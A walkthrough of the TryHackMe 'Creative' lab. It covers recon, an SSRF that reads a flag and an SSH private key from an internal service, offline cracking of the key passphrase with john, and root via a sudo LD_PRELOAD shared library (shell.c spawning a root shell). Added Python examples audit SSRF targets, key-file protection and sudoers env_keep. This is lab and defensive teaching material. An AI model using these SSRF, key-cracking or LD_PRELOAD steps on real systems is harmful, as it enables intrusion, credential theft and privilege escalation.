wp-tryhackme-creative

Creative. Target IP address: 10.10.199.222


❯ nmap -F 10.10.199.222
...
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http


❯ nmap -p80 -sV 10.10.199.222
...
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# remember to remove this entry afterwards
❯ vim /etc/hosts
...
10.10.199.222 creative.thm


# nothing interesting on the main vhost
❯ gobuster dir -u http://creative.thm/ -w /usr/share/dirb/wordlists/big.txt
...
/assets (Status: 301) [Size: 178] [--> http://creative.thm/assets/]
Progress: 20469 / 20470 (100.00%)

# enumerate virtual hosts (subdomains)
❯ gobuster vhost -u creative.thm -w ../tool/dic/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 --append-domain
...
Found: beta.creative.thm Status: 200 [Size: 591]
Progress: 4989 / 4990 (99.98%)

sudo vim /etc/hosts
10.10.199.222 beta.creative.thm

beta.creative.thm fetches a user-supplied URL (the url parameter) and is vulnerable to SSRF.

Install SSRFmap and save the request headers and body, captured from the browser, as request.txt.


❯ python ssrfmap.py -r request.txt -p url -m portscan > output
...

cat output | grep open
[05:49:06] IP:127.0.0.1 , Found open port n°80
[05:50:56] IP:127.0.0.1 , Found open port n°1337

Through the SSRF, request http://127.0.0.1:1337/home/saad/user.txt from the internal service on port 1337 to read flag 1.

The same service serves the user's SSH private key at http://127.0.0.1:1337/home/saad/.ssh/id_rsa.

View the response in the browser's page source and copy the key into a local file named id_rsa.
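The root cause on beta.creative.thm is a URL fetcher that follows whatever address the user supplies, including loopback. The following is an added example (not code from the writeup, the room, or SSRFmap) showing the guard such an endpoint needs and the same check turned into a detector over access-log lines. The log lines, the FAKE_DNS table and the stub resolver are constructed for the demo so it runs offline; the real resolver uses socket.getaddrinfo.

```python
"""SSRF guard for a URL-fetching endpoint plus an access-log detector.
Added example; not part of the Creative writeup or SSRFmap."""
import ipaddress
import re
import socket
from urllib.parse import parse_qs, urlparse

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host):
    """Every address a hostname resolves to (literal IPs resolve to themselves)."""
    try:
        return {ai[4][0] for ai in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return set()


def classify_target(url, resolver=resolve_all):
    """Return (allowed, reason). `resolver` is a hook so tests can run offline."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        return False, "userinfo in URL"
    addrs = resolver(host)
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False, "unparseable address %r" % addr
        # Covers loopback, RFC1918, link-local, IPv4-mapped IPv6, shared space, etc.
        if not ip.is_global:
            return False, "%s resolves to non-public address %s" % (host, ip)
    return True, "ok"


# Constructed DNS answers (assumption for the demo; not real records).
FAKE_DNS = {"example.com": "93.184.216.34", "intranet.corp": "10.0.0.5"}


def stub_resolver(host):
    return {FAKE_DNS.get(host, host)}


# Constructed nginx access-log lines modelled on an SSRF port scan; not from the room.
SAMPLE_LOG = """\
10.9.1.5 - - [05/Jan/2024:05:49:06 +0000] "POST / HTTP/1.1" 200 591 "-" "python-requests/2.31"
10.9.1.5 - - [05/Jan/2024:05:49:07 +0000] "GET /?url=http://127.0.0.1:80/ HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.9.1.5 - - [05/Jan/2024:05:50:56 +0000] "GET /?url=http://127.0.0.1:1337/home/saad/.ssh/id_rsa HTTP/1.1" 200 3389 "-" "Mozilla/5.0"
10.9.1.5 - - [05/Jan/2024:05:51:10 +0000] "GET /?url=https://example.com/ HTTP/1.1" 200 1256 "-" "Mozilla/5.0"
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_ssrf_lines(log_text, resolver=resolve_all, param="url"):
    """Return [(line_no, target, reason)] for requests whose url parameter
    points at a non-public address, i.e. the SSRF pattern seen in this room."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlparse(m.group(1)).query)
        for target in query.get(param, []):
            allowed, reason = classify_target(target, resolver)
            if not allowed:
                hits.append((n, target, reason))
    return hits


if __name__ == "__main__":
    for url in ("http://127.0.0.1:1337/home/saad/user.txt", "https://example.com/"):
        print(url, classify_target(url, stub_resolver))
    for hit in flag_ssrf_lines(SAMPLE_LOG, stub_resolver):
        print("SSRF suspect:", hit)
```

Resolve-then-check still loses to DNS rebinding if the fetcher resolves the name a second time when it connects; the complete fix is to connect to the exact address that passed the check rather than re-resolving the hostname.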

❯ ssh -i id_rsa saad@creative.thm
Enter passphrase for key 'id_rsa':

# the key is passphrase-protected, so crack the passphrase offline

❯ ssh2john id_rsa > hash

❯ john ./hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
...
sweetness (id_rsa)
...

❯ ssh -i id_rsa saad@creative.thm
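Whether a stolen key falls to a wordlist in minutes depends as much on the key file format as on the passphrase: legacy PEM keys derive their encryption key with a single MD5 pass, while OpenSSH's own format runs bcrypt for a configurable number of rounds. The auditor below is an added example (not from the writeup) that a key owner can run over their own keys without knowing the passphrase; it parses only the key header. The sample blobs are constructed fixtures with no real key material, and the 16-round threshold is an assumption taken from ssh-keygen's default.

```python
"""Audit how a private key's passphrase is protected. Added example; not
part of the Creative writeup. Reads only the header, never the key itself."""
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\0"
MIN_BCRYPT_ROUNDS = 16  # assumption: ssh-keygen's default (-a)


def _read_string(buf, off):
    """SSH wire 'string': uint32 length followed by that many bytes."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def audit_private_key(pem_text):
    """Return a dict describing the key's format, KDF and a verdict."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        if kdf == b"none":
            return {"format": "openssh-v1", "encrypted": False, "kdf": "none",
                    "rounds": 0, "verdict": "UNENCRYPTED"}
        # bcrypt kdfoptions = string salt || uint32 rounds
        _salt, o = _read_string(kdfopts, 0)
        (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        verdict = "OK" if rounds >= MIN_BCRYPT_ROUNDS else "WEAK (few bcrypt rounds)"
        return {"format": "openssh-v1", "encrypted": True, "kdf": kdf.decode(),
                "cipher": cipher.decode(), "rounds": rounds, "verdict": verdict}
    if header == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        return {"format": "pkcs8", "encrypted": True, "kdf": "unknown (PBKDF2 params not parsed)",
                "rounds": None, "verdict": "INSPECT"}
    if header.startswith("-----BEGIN ") and header.endswith(" PRIVATE KEY-----"):
        encrypted = any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines)
        return {"format": "legacy-pem", "encrypted": encrypted,
                "kdf": "md5-1-iteration" if encrypted else "none",
                "rounds": 1 if encrypted else 0,
                "verdict": "WEAK (legacy KDF, one MD5 pass)" if encrypted else "UNENCRYPTED"}
    raise ValueError("not a recognised private key")


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def make_openssh_header(cipher, kdf, rounds):
    """Constructed fixture: only the header fields of an openssh-key-v1 blob,
    enough for audit_private_key(); contains no key material."""
    opts = b"" if kdf == "none" else _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = (OPENSSH_MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
            + _ssh_string(opts) + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % body


# Constructed legacy-format fixture (dummy body, not a real key).
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    print(audit_private_key(LEGACY_ENCRYPTED))
    print(audit_private_key(make_openssh_header("aes256-ctr", "bcrypt", 16)))
    print(audit_private_key(make_openssh_header("none", "none", 0)))
```

Keys reported as legacy-pem can be rewritten into the bcrypt-protected format in place with ssh-keygen -p -o on the owner's machine; the point of the audit is to find them before they are exposed the way this one was.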
saad@m4lware:~$ cat .bash_history

...
echo "saad:MyStrongestPasswordYet$4291" > creds.txt
rm creds.txt
...

saad@m4lware:~$ sudo -l
[sudo] password for saad: # enter the password recovered from .bash_history
Matching Defaults entries for saad on m4lware:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
env_keep+=LD_PRELOAD # this is the important line
User saad may run the following commands on m4lware:
(root) /usr/bin/ping

# LD_PRELOAD survives sudo here, so a shared library is loaded into the root-owned ping process

vim shell.c

cat shell.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setgid/setuid */

/* Built with -nostartfiles, so _init is the library's own entry point and
   runs as soon as the dynamic loader maps it into the target process. */
void _init() {
    unsetenv("LD_PRELOAD");  /* stop the library being injected into the child shell too */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so

saad@m4lware:~$ sudo LD_PRELOAD=./shell.so ping
# whoami
root
# cat /root/root.txt
# get flag2
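The whole escalation rests on one sudoers Default: env_keep preserving LD_PRELOAD for a command run as root. The script below is an added example (not from the writeup) of the check a sysadmin or auditor would run over sudo -l output or a sudoers file: it lists preserved variables that control code loading, lists the root commands they would affect, and emits a corrected Defaults block. The LOADER_VARS table is this example's own list, not sudo's built-in policy; SUDO_L_OUTPUT reproduces the sudo -l output above without the inline annotation.

```python
"""Audit sudoers / `sudo -l` output for env_keep entries that let a user
control how a root command is loaded. Added example; not from the writeup."""
import re

# Environment variables that change which code a program loads.
# Assumption for this example: a hand-picked list, not sudo's own blacklist.
LOADER_VARS = {
    "LD_PRELOAD": "injects a shared library into every dynamically linked program",
    "LD_LIBRARY_PATH": "redirects shared-library lookup to user-controlled directories",
    "LD_AUDIT": "loads an audit library into the dynamic loader",
    "PYTHONPATH": "controls module lookup for Python commands",
    "PERL5LIB": "controls module lookup for Perl commands",
}

# Matches both `sudo -l` form (env_keep+=LD_PRELOAD) and sudoers form
# (Defaults env_keep += "LD_PRELOAD LANG").
ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*"?([A-Za-z0-9_ ]+)"?')
# Matches rule lines such as `(root) /usr/bin/ping` or `(ALL) NOPASSWD: /bin/ls`.
RULE_RE = re.compile(r'^\s*\(([^)]+)\)\s+(?:NOPASSWD:\s*)?(\S.*)$', re.M)

# The `sudo -l` output from this room, minus the inline annotation.
SUDO_L_OUTPUT = """\
Matching Defaults entries for saad on m4lware:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin,
env_keep+=LD_PRELOAD
User saad may run the following commands on m4lware:
(root) /usr/bin/ping
"""


def kept_env_vars(text):
    """Every variable name added to env_keep anywhere in the text."""
    found = set()
    for m in ENV_KEEP_RE.finditer(text):
        found.update(m.group(1).split())
    return found


def audit_env_keep(text):
    """[(var, why)] for preserved variables that influence code loading."""
    return sorted((v, LOADER_VARS[v]) for v in kept_env_vars(text) if v in LOADER_VARS)


def root_commands(text):
    """Commands the user may run as root (runas user root or ALL)."""
    return [cmd.strip() for runas, cmd in RULE_RE.findall(text)
            if runas.split(":")[0].strip() in ("root", "ALL")]


def fixed_defaults(text):
    """Corrected Defaults block in sudoers syntax: keep env_reset, drop loader vars."""
    keep = sorted(kept_env_vars(text) - set(LOADER_VARS))
    lines = ["Defaults env_reset"]
    if keep:
        lines.append('Defaults env_keep += "%s"' % " ".join(keep))
    return "\n".join(lines)


def report(text):
    """Human-readable findings; empty list means no loader variable is preserved."""
    findings = []
    cmds = root_commands(text)
    for var, why in audit_env_keep(text):
        findings.append("%s preserved across sudo: %s; affects root commands %s"
                        % (var, why, ", ".join(cmds) or "(none listed)"))
    return findings


if __name__ == "__main__":
    for line in report(SUDO_L_OUTPUT):
        print("FINDING:", line)
    print("Suggested sudoers Defaults:\n" + fixed_defaults(SUDO_L_OUTPUT))
```

sudo's env_reset already strips LD_* variables by default; the finding here is that env_keep explicitly re-adds one, which is exactly what sudo -l makes visible and what this check keys on.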